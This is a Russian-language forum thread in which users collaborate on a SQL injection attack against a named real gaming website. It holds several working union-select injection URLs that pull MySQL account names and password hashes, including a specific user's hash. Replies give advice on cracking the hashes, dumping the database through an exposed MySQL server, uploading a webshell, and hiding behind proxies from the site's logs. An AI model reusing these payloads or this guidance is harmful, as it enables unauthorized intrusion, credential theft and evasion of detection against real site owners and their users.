При вводе: Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,user,password,6,7,8,1,1,1+from+mysql.user/* Получаю yroot 31a457464200908a Но при вводе этого логина и паса в http://www.gamersblock.com/admin мне пишет что не правильный пароль. Почему?
31a457464200908a - не пароль, а хэш MySQL. Это раз. Во-вторых, не факт, что пара от БД подойдет к админке...
От какого пользователся работает пага? То, что ты выковырял - учётные данные из системного каталога MySQL 4.X. То есть это реквизиты аккаунта суперпользователся для подключения к БД и они НИКАКОГО отношения к админке не имеют (исключая случай, что админ лопух и везде использует одни и те же логин/пароль). Если на их хосте МУСКЛЬ торчит яйцами наружу, то сбрутив пасс по админскому хешу, ты сможешь подключиться к ней извне и слить все имеющиеся там базы данных. Но я больше чем уверен, что мускль зацеплен только за localhost. В любом случае - ты можешь попытаться подобрать имена таблицы и столбцов, в которых хранятся реальные данные мемберов сломанной паги. Но если у тебя страничка крутится от root, тут есть возможность залить простенький вебшелл, а там уже возможности побогаче... З.Ы. А ты уверен, что у полученной учётной записи y стоит перед root? Это не мусор?
ну, код скули я оставил, посмотри. Вроде не лишнее. можно узнать, как єто делается? (можно и в виде ссылок). просто это моя первая скуля, и хочется дальше развиваться в этом направлении
Подключиться можно с помощью putty, если под виндой сидишь, но, как сказал groundhog, тебя скорей всего ждет облом
вобщем так: Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(USER_LOGIN,0x71),0x71),6,7,8,1,1,1+from+users/* а поле с паролями сам ищи... я посмотрел, не нашел... но у меня и времени особо нет, чтоб это выискивать... полученные данные скорее всего подойдут к админке (будем надеяться) там еще форум есть phpBB, но кроме Anonymous никакой учетки выдрать неудалось: Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,4,aes_decrypt(aes_encrypt(username,0x71),0x71),6,7,8,1,1,1+from+phpbb.phpbb_users/* зы:user() - mroca@localhost filepriv нет
Я имею в виду, что если у тебя пага крутится от рута, то значит ты через скулю сможешь залить вебшелл, т.е. с помощью запроса создать файлик в контексте веб-сервера с содержимым типа: Я имею в виду, в случае "торчания" мускла наружу и зная пасс админа, ты можешь любым mysql клиентом присоединиться к ихнему хосту и слить базу, тебе даже не нужно будет получать какие-то права на веб-сервере. Можно стандартно через MySQL Control Center, EMS MySQL Manager, MySQL Front... Клиентов дофига я не могу их тут перечислять... Только носки не забудь натянуть, а то злые админы в логах посмортят кто и когда что-то сливал.
Там в табличке users (не mysql.user) есть пользователь mroca как и пользователь бд, так вот мож его пароль от бд подойдет к админке: Code: http://www.gamersblock.com/reports.php?id=-159+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,1,1,1+from+mysql.user%20where%20user=CHAR(109,114,111,99,97)/* mroca:3785da1b4f22cdc9 расшифровывай хеш: 3785da1b4f22cdc9 (MySql) и пробуй
Ну обычно то непричем конечно, просто я предположил, что они могут совпасть, т.к. и в mysql.user и в таблице пользователей сайта есть пользователь mroca ну если не подходит, значит надо искать в таблице users поле которое отвечает за пароли